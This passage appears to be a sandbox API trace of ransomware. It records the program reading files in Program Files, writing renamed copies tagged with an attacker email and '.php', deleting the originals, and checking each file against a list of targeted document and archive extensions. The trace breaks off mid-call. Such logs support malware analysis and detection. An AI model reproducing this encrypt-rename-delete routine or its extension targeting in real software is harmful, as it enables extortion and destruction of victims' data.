"c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0049.378] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=416918) returned 1 [0049.378] CloseHandle (hObject=0x194) returned 1 [0049.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 0x20 [0049.378] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0049.378] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0049.378] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.379] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.379] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0049.379] GetLastError () returned 0x0 [0049.379] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x65c96, lpOverlapped=0x0) returned 1 [0049.387] WriteFile (in: hFile=0x200, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x65ca0, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x65ca0, lpOverlapped=0x0) returned 1 [0049.594] ReadFile (in: hFile=0x194, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.594] WriteFile (in: hFile=0x200, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0049.594] SetEndOfFile (hFile=0x200) returned 1 [0049.594] CloseHandle (hObject=0x200) returned 1 [0049.595] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.595] SetEndOfFile (hFile=0x194) returned 1 [0049.598] CloseHandle (hObject=0x194) returned 1 [0049.598] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0049.598] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\vba\\vba7\\1033\\vbui6.chm")) returned 1 [0049.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.599] lstrlenW (lpString=".doc") returned 4 [0049.599] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.599] lstrlenW (lpString=".docx") returned 5 [0049.599] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.599] lstrlenW (lpString=".pdf") returned 4 [0049.599] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.599] lstrlenW (lpString=".xls") returned 4 [0049.599] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.599] lstrlenW (lpString=".xlsx") returned 5 [0049.599] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.599] lstrlenW (lpString=".ppt") returned 4 [0049.599] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.599] lstrlenW (lpString=".zip") returned 4 [0049.599] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.599] lstrlenW (lpString=".rar") returned 4 [0049.599] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.599] lstrlenW (lpString=".bz2") returned 4 [0049.599] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.599] lstrlenW (lpString=".7z") returned 3 [0049.599] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.599] lstrlenW (lpString=".dbf") returned 4 [0049.599] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.599] lstrlenW (lpString=".1cd") returned 4 [0049.599] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.599] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.599] lstrlenW (lpString=".jpg") returned 4 [0049.599] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.600] lstrlenW (lpString=".doc") returned 4 [0049.600] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString=".docx") returned 5 [0049.600] lstrcmpiW (lpString1=".docx", lpString2="6.CHM") returned -1 [0049.600] lstrlenW (lpString=".pdf") returned 4 [0049.600] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString=".xls") returned 4 [0049.600] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString=".xlsx") returned 5 [0049.600] lstrcmpiW (lpString1=".xlsx", lpString2="6.CHM") returned -1 [0049.600] lstrlenW (lpString=".ppt") returned 4 [0049.600] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.600] lstrlenW (lpString=".zip") returned 4 [0049.600] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString=".rar") returned 4 [0049.600] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString=".bz2") returned 4 [0049.600] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1 [0049.600] lstrlenW (lpString=".7z") returned 3 [0049.600] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1 [0049.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.600] lstrlenW (lpString=".dbf") returned 4 [0049.600] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1 [0049.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.600] lstrlenW (lpString=".1cd") returned 4 [0049.600] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1 [0049.600] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7\\1033\\VBUI6.CHM") returned 70 [0049.600] lstrlenW (lpString=".jpg") returned 4 [0049.600] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1 [0049.601] lstrcmpiW (lpString1=".png", lpString2=".php") returned 1 [0049.601] lstrlenW (lpString="16to9Squareframe_Buttongraphic.png") returned 34 [0049.601] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0050.957] GetFileSizeEx (in: hFile=0x1f4, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=10123) returned 1 [0050.957] CloseHandle (hObject=0x1f4) returned 1 [0050.958] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png")) returned 0x20 [0050.958] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0050.958] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\16to9squareframe_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0050.958] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.958] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.958] lstrlenW (lpString=".doc") returned 4 [0050.958] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.958] lstrlenW (lpString=".docx") returned 5 [0050.958] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0050.958] lstrlenW (lpString=".pdf") returned 4 [0050.958] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.958] lstrlenW (lpString=".xls") returned 4 [0050.958] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.958] lstrlenW (lpString=".xlsx") returned 5 [0050.958] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0050.958] lstrlenW (lpString=".ppt") returned 4 [0050.958] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.958] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.958] lstrlenW (lpString=".zip") returned 4 [0050.958] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.958] lstrlenW (lpString=".rar") returned 4 [0050.958] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.958] lstrlenW (lpString=".bz2") returned 4 [0050.958] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.958] lstrlenW (lpString=".7z") returned 3 [0050.958] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.958] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.959] lstrlenW (lpString=".dbf") returned 4 [0050.959] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.959] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.959] lstrlenW (lpString=".1cd") returned 4 [0050.959] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.959] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.959] lstrlenW (lpString=".jpg") returned 4 [0050.959] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.959] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.959] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.959] lstrlenW (lpString=".doc") returned 4 [0050.959] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0050.959] lstrlenW (lpString=".docx") returned 5 [0050.959] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0050.959] lstrlenW (lpString=".pdf") returned 4 [0050.959] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0050.959] lstrlenW (lpString=".xls") returned 4 [0050.959] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0050.959] lstrlenW (lpString=".xlsx") returned 5 [0050.959] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0050.959] lstrlenW (lpString=".ppt") returned 4 [0050.959] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0050.959] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.959] lstrlenW (lpString=".zip") returned 4 [0050.959] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0050.959] lstrlenW (lpString=".rar") returned 4 [0050.959] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0050.959] lstrlenW (lpString=".bz2") returned 4 [0050.959] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0050.959] lstrlenW (lpString=".7z") returned 3 [0050.959] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0050.959] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.959] lstrlenW (lpString=".dbf") returned 4 [0050.959] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0050.960] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.960] lstrlenW (lpString=".1cd") returned 4 [0050.960] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0050.960] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\16to9Squareframe_Buttongraphic.png") returned 78 [0050.960] lstrlenW (lpString=".jpg") returned 4 [0050.960] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0050.960] lstrcmpiW (lpString1=".png", lpString2=".php") returned 1 [0050.960] lstrlenW (lpString="203x8subpicture.png") returned 19 [0050.960] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0051.057] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=2820) returned 1 [0051.057] CloseHandle (hObject=0x194) returned 1 [0051.057] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png")) returned 0x20 [0051.057] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.057] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0051.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.058] lstrlenW (lpString=".doc") returned 4 [0051.058] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0051.058] lstrlenW (lpString=".docx") returned 5 [0051.058] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0051.058] lstrlenW (lpString=".pdf") returned 4 [0051.058] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0051.058] lstrlenW (lpString=".xls") returned 4 [0051.058] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0051.058] lstrlenW (lpString=".xlsx") returned 5 [0051.058] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0051.058] lstrlenW (lpString=".ppt") returned 4 [0051.058] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0051.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.058] lstrlenW (lpString=".zip") returned 4 [0051.058] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0051.058] lstrlenW (lpString=".rar") returned 4 [0051.058] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0051.058] lstrlenW (lpString=".bz2") returned 4 [0051.058] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0051.058] lstrlenW (lpString=".7z") returned 3 [0051.058] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0051.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.058] lstrlenW (lpString=".dbf") returned 4 [0051.058] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0051.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.058] lstrlenW (lpString=".1cd") returned 4 [0051.058] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0051.058] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.058] lstrlenW (lpString=".jpg") returned 4 [0051.058] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0051.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.059] lstrlenW (lpString=".doc") returned 4 [0051.059] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0051.059] lstrlenW (lpString=".docx") returned 5 [0051.059] lstrcmpiW (lpString1=".docx", lpString2="e.png") returned -1 [0051.059] lstrlenW (lpString=".pdf") returned 4 [0051.059] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0051.059] lstrlenW (lpString=".xls") returned 4 [0051.059] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0051.059] lstrlenW (lpString=".xlsx") returned 5 [0051.059] lstrcmpiW (lpString1=".xlsx", lpString2="e.png") returned -1 [0051.059] lstrlenW (lpString=".ppt") returned 4 [0051.059] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0051.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.059] lstrlenW (lpString=".zip") returned 4 [0051.059] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0051.059] lstrlenW (lpString=".rar") returned 4 [0051.059] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0051.059] lstrlenW (lpString=".bz2") returned 4 [0051.059] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0051.059] lstrlenW (lpString=".7z") returned 3 [0051.059] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0051.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.059] lstrlenW (lpString=".dbf") returned 4 [0051.059] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0051.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.059] lstrlenW (lpString=".1cd") returned 4 [0051.059] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0051.059] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned 77 [0051.059] lstrlenW (lpString=".jpg") returned 4 [0051.059] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0051.060] lstrcmpiW (lpString1=".png", lpString2=".php") returned 1 [0051.060] lstrlenW (lpString="SpecialNavigationUp_ButtonGraphic.png") returned 37 [0051.060] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0051.319] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x322ff1c | out: lpFileSize=0x322ff1c*=4866) returned 1 [0051.325] CloseHandle (hObject=0x198) returned 1 [0051.325] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png")) returned 0x20 [0051.337] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0051.340] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0051.346] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 97 [0051.347] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 97 [0051.357] lstrlenW (lpString=".doc") returned 4 [0051.357] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0051.357] lstrlenW (lpString=".docx") returned 5 [0051.357] lstrcmpiW (lpString1=".docx", lpString2="c.png") returned -1 [0051.357] lstrlenW (lpString=".pdf") returned 4 [0051.357] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0051.357] lstrlenW (lpString=".xls") returned 4 [0051.357] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0051.357] lstrlenW (lpString=".xlsx") returned 5 [0051.357] lstrcmpiW (lpString1=".xlsx", lpString2="c.png") returned -1 [0051.357] lstrlenW (lpString=".ppt") returned 4 [0051.357] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0051.357] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 97 [0051.357] lstrlenW (lpString=".zip") returned 4 [0051.357] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0051.357] lstrlenW (lpString=".rar") returned 4 [0051.357] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0051.357] lstrlenW (lpString=".bz2") returned 4 [0051.358] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0051.358] lstrlenW (lpString=".7z") returned 3 [0051.358] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0051.358] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 97 [0051.358] lstrlenW (lpString=".dbf") returned 4 [0051.358] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0051.358] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 97 [0051.358] lstrlenW (lpString=".1cd") returned 4 [0051.358] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0051.358] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationUp_ButtonGraphic.png") returned 97 [0051.358] lstrlenW (lpString=".jpg") returned 4 [0051.358] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0052.454] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.468] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x322fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0053.022] GetLastError () returned 0x0 [0053.022] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x4932, lpOverlapped=0x0) returned 1 [0053.034] WriteFile (in: hFile=0x1a8, lpBuffer=0x38c0020*, nNumberOfBytesToWrite=0x4940, lpNumberOfBytesWritten=0x322fc9c, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesWritten=0x322fc9c*=0x4940, lpOverlapped=0x0) returned 1 [0053.036] ReadFile (in: hFile=0x1b4, lpBuffer=0x38c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x322fed4, lpOverlapped=0x0 | out: lpBuffer=0x38c0020*, lpNumberOfBytesRead=0x322fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.036] WriteFile (in: hFile=0x1a8, 